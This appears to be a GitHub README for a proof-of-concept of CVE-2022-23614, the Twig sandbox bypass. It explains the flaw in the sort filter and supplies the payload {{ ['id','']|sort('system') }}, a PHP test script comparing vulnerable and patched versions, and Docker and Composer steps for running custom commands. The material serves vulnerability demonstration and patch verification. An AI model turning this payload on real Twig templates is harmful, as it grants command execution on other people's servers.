4rtamis/CVE-2022-23614

CVE-2022-23614

Proof of concept (PoC) for CVE-2022-23614, the Twig issue referenced in Debian's DSA-5107-1.

  • CVSS v2.0: 7.5
  • CVSS v3.x: 9.8

Explanation

Twig is a flexible, fast, and secure template engine for PHP. Templates can apply filters to values when they are rendered. The sort filter sorts the elements of an array; recent 2.x and 3.x versions also accept an optional "arrow" argument, a Twig closure used as the comparator (for example to sort in descending order):

{{ [5,8,2,3]|sort }}
{{ [5,8,2,3]|sort((a, b) => b - a) }}

Twig has a sandbox mode for evaluating untrusted template code. In sandbox mode the arrow parameter of the sort filter must be a closure, otherwise an attacker could name an arbitrary PHP function as the comparator. In affected versions (before 1.44.7, 2.14.11 and 3.3.8) this constraint was not enforced: the value was handed straight to uasort(), so any callable string such as system, exec or passthru ran with the array elements as its arguments. Outside the sandbox the check does not apply, since non-sandboxed templates are trusted by design. The payload used by this PoC is:

{{ ["id",""]|sort('system') }}
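The following is an added example, not code from this repository or from Twig itself. It reproduces the bug with the Twig sandbox explicitly enabled, which is the only mode the fix protects, and shows the two outcomes side by side: on an affected version the string arrow reaches uasort() and the id command runs; on a patched version Twig throws a RuntimeError before sorting, while a genuine arrow function still works. It assumes twig/twig is installed with Composer in the current directory (vendor/autoload.php); the templates, the context arrays and the renderOrError helper are constructed for this example.

```php
<?php
// Added example (not part of this repository or of Twig): run the PoC payload
// through a sandboxed Twig environment. Assumes Composer's autoloader is at
// ./vendor/autoload.php and twig/twig is installed (any 2.x or 3.x release).
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Constructed templates: 'payload' passes a plain string (a PHP function name)
// as the sort comparator; 'legit' passes a real Twig arrow function.
$loader = new ArrayLoader([
    'payload' => "{{ args|sort('system') }}\n",
    'legit'   => "{{ args|sort((a, b) => b - a)|join(',') }}\n",
]);
$twig = new Environment($loader, ['cache' => false]);

// Allow only the filters the templates need and enable the sandbox globally
// (second constructor argument), so every render goes through the policy.
$policy = new SecurityPolicy([], ['sort', 'join'], [], [], []);
$twig->addExtension(new SandboxExtension($policy, true));

// Hypothetical helper for this example: render and turn Twig's sandbox/runtime
// errors into a printable line instead of a fatal error.
function renderOrError(Environment $twig, string $name, array $context): string
{
    try {
        return $twig->render($name, $context);
    } catch (RuntimeError | SecurityError $e) {
        return get_class($e) . ': ' . $e->getMessage() . "\n";
    }
}

echo 'Twig ', Environment::VERSION, "\n";

// Affected versions: the filter calls uasort(['id', ''], 'system'), i.e.
// system('id', ''), and the output of `id` appears on stdout.
// Patched versions (1.44.7, 2.14.11, 3.3.8): RuntimeError stating that the
// callable passed to the "sort" filter must be a Closure in sandbox mode.
echo renderOrError($twig, 'payload', ['args' => ['id', '']]);

// A closure comparator is accepted in both cases: prints 8,5,3,2
echo renderOrError($twig, 'legit', ['args' => [5, 8, 2, 3]]);
```

Run it once against the vulnerable package version pinned by this PoC and once after upgrading twig/twig; only the first line of output should change. The same check applies to the other arrow-taking filters (filter, map, reduce), so a template that reaches any of them with a string argument deserves the same scrutiny.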

Usage

This PoC illustrates the vulnerability in two different setups: the Debian php-twig package (v2.14.1) or the Composer package twig/twig (v2.14).

The index.php file crafts a Twig template based on the first argument. In the following code, argv[1] is the name of the sorting function that will be used by Twig when rendering.

// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";

Then, index.php uses two deprecated Twig functions to load the generated template. Finally, it decodes the second argument (argv[2], a JSON object) and passes it as the rendering context; its args key holds the array that we want to sort.

// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);

The rendered template is then printed in the standard output.

Please note that this repository was made for demonstration purposes only. It is meant to be simple to understand and easy to use, so that the CVE can be explored from a command line alone. It is quite far from what one would find on an actual vulnerable server.

php-twig

Using Docker, we can recreate the context of the original Debian Security Advisory (DSA). Use the provided build-docker.sh script to build and run the vulnerable container:

chmod a+x build-docker.sh
./build-docker.sh

The container shuts down once the payload (an id command) has been executed. If you want to try your own commands, run the container in interactive mode:

docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash

Once in the container, you can craft your own payload using the following model:

php index.php system '{"args":["id",""]}'
                ^                 ^
          sorting function   array to sort

This dockerfile was partially created using DECRET.

Composer

If you already have PHP and Composer installed on your machine, you can replicate the exploit using the vulnerable Composer package.

cd exploit
composer install

Then you just have to play with the payload.

php index.php system '{"args":["id",""]}'

References

CVE details: https://nvd.nist.gov/vuln/detail/CVE-2022-23614

DSA: https://www.debian.org/security/2022/dsa-5107

Patch commit: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9

PoC by davwwwx (using GUI): https://github.com/davwwwx/CVE-2022-23614
